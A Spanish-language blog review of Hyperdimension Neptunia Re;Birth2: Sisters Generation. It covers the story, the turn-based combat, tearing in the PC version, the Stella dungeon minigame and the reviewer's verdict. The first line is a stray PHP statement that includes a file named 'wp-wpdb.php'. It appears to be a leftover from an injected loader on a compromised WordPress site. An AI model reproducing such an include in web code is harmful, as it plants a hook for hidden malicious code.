if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Hyperdimension Neptunia Re;Birth2: Sisters Generation – La Fortaleza de LeChuck

Análisis Hyperdimension Neptunia Re;Birth2: Sisters Generation

Tras la buena acogida que tuvo el primer Hyperdimension Neptunia Re;Birth el equipo de Compile Heart se puso manos a la obra con la segunda entrega de la saga, Hyperdimension Neptunia Re;Birth2: Sisters Generation, solo que esta vez en vez de un remake han lanzado lo que se podría denominar como una versión mejorada del Hyperdimension Neptunia Mk2 que salió para PlayStation 3 en su día. Esta versión mejorada trae algunos añadidos tanto en la jugabilidad como en los escenarios, e incluso han añadido nuevos finales a la historia y características jugables tales como “La mazmorra de Stella” o el Remake Sistem que ya se vio en el primer Re;Birth de la saga.

Hyperdimension-Neptunia-Re-Birth2-1

Hyperdimension Neptunia Re;Birth 2 sigue guardando ese toque tan genial y absurdo que tiene la saga sobre su particular parodia de la guerra de las consolas que se ve cada día en los foros y las webs de noticias, tiene bastantes referencias sobre el mundo de los videojuegos e incluso han añadido nuevos personajes, que no aparecían en la versión de PlayStation 3, con los nombres de las compañías que han ayudado a crear el juego a modo de homenaje.

El juego es una mezcla de JRPG por turnos y novela visual, cada vez que vayamos avanzando en la historia esta se nos contará mediante imágenes y texto, de los cuales solo lo más importantes para la historia está doblado con voz, mientras que los combates y la exploración de los mapas se harán en entornos 3D.

Aunque por desgracia este Re;Birth 2 ha apostado más por grandes dosis de fanservice, que roza lo inmoral en más de una ocasión, más que por una gran cantidad de chistes y referencias como se vio en su primera entrega, donde en cada conversación había algún toque de humor sobre la industria del videojuego, esto hacía que el juego fuese mucho más ameno y entretenido. Sabemos que la carne vende, pero en este caso han salido perdiendo.

HISTORIA

La historia es uno de los puntos más fuertes de Hyperdimension Neptunia Re;Birth 2, el juego nos sitúa tras los acontecimientos del primer Re;Birth donde tras varios años nos encontramos ante un mundo en crisis y devastado debido a que ASIC, la banda que creo Arfoire en el primer juego, y que representa la piratería en el mundo de los videojuegos, se ha ido adueñado de las mentes de los habitantes poco a poco haciendo que el Share, o el poder divino, de cada diosa baje de tal forma que los reinos se han quedado desprotegidos ante las fuerzas oscuras de la piratería.

Hyperdimension-Neptunia-Re-Birth2-2

En un desesperado intento por recuperar el poder robado, las 4 diosas (o CPUs como se las conoce) junto con Nepgear, que es una aspirante a CPU en el país de Planeptune, se unen para atacar la base de ASIC que se encuentra en el cementerio de Gamindustri, tras una brutal pelea con una de los 4 generales de Arfoire las diosas son vencidas y posteriormente encarceladas.

Estas permanecen encerradas y ASIC consigue hacerse con la fe del 80% de los habitantes de Gamindustri haciendo inviable el reinado de las diosas y sus sucesoras, tras 3 años de intensa búsqueda If y Compa, nuestras compañeras desde el primer título de la saga, consiguen encontrar a las CPUs en un estado lamentable.

Pero la felicidad les dura poco, tras encontrarlas son sorprendidas por uno de los generales de Arfoire, y al no ser capaces de plantarle cara, huyen del cementerio con la única de las diosas que tenía algo de energía, la aspirante a CPU Nepgear.

Esta vez la misión de salvar Gamindustri no reside en las consolas principales a las cuales hacen referencia las 4 diosas, si no a sus aspirantes que claramente están representando las consolas portátiles de cada marca, Nepgear representa a la Gamegear, Uni a la PSP y Rom y Ram a la Nintendo DS.

Hyperdimension-Neptunia-Re-Birth2-3

JUGABILIDAD

Hyperdimension Neptunia Re;Birth 2 mantiene el sistema de combate por turnos que se adaptó para el primer Re;Birth donde los turnos se ordenan en función de la agilidad de nuestras protagonistas y de los enemigos a los que nos enfrentemos.

Durante nuestro turno el personaje tendrá un área delimitada por un círculo que varía en función de nuestro nivel de movimiento y por el cual se podrá mover libremente, durante nuestra aventura tendremos unos cuantos objetos y equipo que nos reducen o amplían el valor del movimiento para que el área sea de mayor o menor tamaño, este valor es muy importante, ya que solo podremos atacar a los enemigos a los que podamos acercarnos, y en combates con muchos enemigos la posición juega un papel vital.

Por otro lado cada arma tendrá un alcance diferente en función del tipo de personaje que llevemos, el alcance efectivo de cada arma estará marcado por una zona rectangular la cual es la forma que tenemos de fijar a los enemigos que queramos, o podamos, atacar.

En el caso de que no podamos fijar a ningún enemigo, ya sea porque nuestro movimiento no nos permite posicionarnos bien o porque nuestra arma no llegue a tocar a nadie, tenemos la posibilidad de pasar nuestro turno poniéndonos en una posición defensiva donde los ataques enemigos hacen menos daño, es muy útil si estamos con poca vida o si el enemigo golpea muy fuerte.

Hyperdimension-Neptunia-Re-Birth2-4

Todos los enemigos tienen dos tipos de barras, la naranja representa su vida mientras que la barra azul representa su guardia la cual sirve como protección, y mientras esté llena los ataques mundanos harán menos daño del debido, nuestros personajes tendrán dos tipos de ataques, unos se centran en dañar la salud y los otros en dañar la guardia, durante nuestro turno podremos realizar cualquier combinación de ataques hasta un máximo de 4 golpes.

Cada personaje tendrá disponibles ciertos movimientos especiales exclusivos que gastarán un determinado valor de puntos de acción, estos van desde curar o revivir a sus aliadas, potenciar personajes o realizar ataques ofensivos que se centran exclusivamente en hacer un significante daño al enemigo.

Las aspirantes a diosas siguen teniendo el modo HDD por el cual se transforman en CPUs a plena potencia, en este modo tendremos disponibles nuevos tipos de ataque mucho más poderosos que en su versión humana, este modo gasta un porcentaje alto de puntos de acción pero es ideal para enfrentarse a los jefes finales.

El cambio más significativo que podemos apreciar en el combate ya que en este juego tenemos la posibilidad de luchar con 4 personajes en vez de 3, seguimos con el sistema de apoyo en base a la “amistad” que va surgiendo conforme avanza la historia, y como pasaba en el anterior Re;Birth, cuanta mayor sea la afinidad entre los personajes mayor será el apoyo que este dé al personaje principal.

También podremos cambiar los puestos con los personajes de apoyo en nuestro turno en vez de atacar por si nos quedemos con muy poca vida o si el personaje no es el más adecuado para luchar contra ese enemigo.

Hyperdimension-Neptunia-Re-Birth2-5

APARTADO TÉCNICO

Este Re;Birth es una versión mejorada del juego que salió en PlayStation 3, por un lado tiene pequeños cambios en los modelados 3D que mejoran los personajes y enemigos y además tiene una interfaz nueva para que los datos, objetos y el texto estén mejor ordenados en la pantalla

El análisis del juego se ha realizado con la versión de PC y durante toda mi aventura, sobre todo a la hora de moverme por los escenarios, he tenido bastante tearing de forma constante, por desgracia el juego no tiene unas opciones gráficas adecuadas para poder corregir esto ya que en las opciones solo puedes cambiar la resolución y si quieres que sea pantalla completa o no, un fallo a tener en cuenta.

En cuanto al apartado sonoro, el juego cumple pero no impresiona, tenemos una gran cantidad de sonidos para los combates y los momentos de acción, pero la banda sonora solo suena en determinados momentos de la historia, se echa de menos que haya música a la hora de explorar mazmorras y en algunos combates.

El juego viene disponible con las voces en inglés o en japonés, los subtítulos en cambio, solo los tenemos disponibles en inglés, y a pesar de que el juego no esté en castellano no es necesario tener un nivel alto de inglés para enterarte de la historia, aunque hay que tener paciencia ya que hay muchas líneas de texto.

Hyperdimension-Neptunia-Re-Birth2-6

LA MAZMORRA DE STELLA

Es uno de los añadidos más curiosos del juego, realmente no es más que un minijuego en donde enviamos a Stella a explorar las zonas que hemos ido desbloqueando con anterioridad. Cada vez que enviemos a Stella a una mazmorra su recorrido se hará en tiempo real, las primeras veces no tardará más de 15 minutos en explorar el mapa y volver con lo que haya podido recoger, pero conforme vayamos subiendo de nivel los viajes se harán más y más largos llegando a durar 12 horas como poco.

Cuando Stella explore una mazmorra recogerá los materiales que se vaya encontrando y los que los enemigos vayan soltando, también podrá encontrar armas y objetos para mejorar su equipamiento para que pueda aguantar el tipo en las mazmorras más difíciles. Podremos elegir el tiempo que queremos que se pase explorando dentro de unos márgenes que varían en función de su nivel y del mapa en sí, cuanto más tiempo esté más posibilidades tiene de encontrar equipo valioso.

Hyperdimension-Neptunia-Re-Birth2-7

CONCLUSIONES

Personalmente el juego me ha dejado un poco frío, mientras que en el primer Re;Birth había chistes y referencias constantemente, en este he encontrado muchas menos, y es una pena ya que es lo que lo hace tan diferente a los demás juegos del mismo género, por otro lado el juego abusa mucho de reutilizar escenarios y enemigos con diferentes colores, cosa que hace muy repetitivo el juego.

El juego ha acabado con un problema de tearing en la versión de PC muy a tener en cuenta, es algo que acaba cansando tras varias horas de juego y debido a que sus opciones gráficas son inexistentes has de apechugar con ello, solo interfiere en los momentos en los que estamos en entornos 3D, pero es en esos sitios donde se desarrolla la parte más entretenida del juego.

Aunque no todo iba a ser malo, a pesar de los errores tanto de diseño cono técnicos, la historia de Hyperdimension Neptunia Re;Birth2: Sisters Generation sigue siendo tan alocada y absurda como viene siendo habitual en la saga, y aunque no sea tan disparatada o no nos sorprenda tanto como las anteriores entregas, es una de las pocas cosas que se salvan del juego. Por otro lado el juego es bastante largo, y si todos esos pequeños problemas no te impiden disfrutar del juego vas a tener entretenimiento para rato.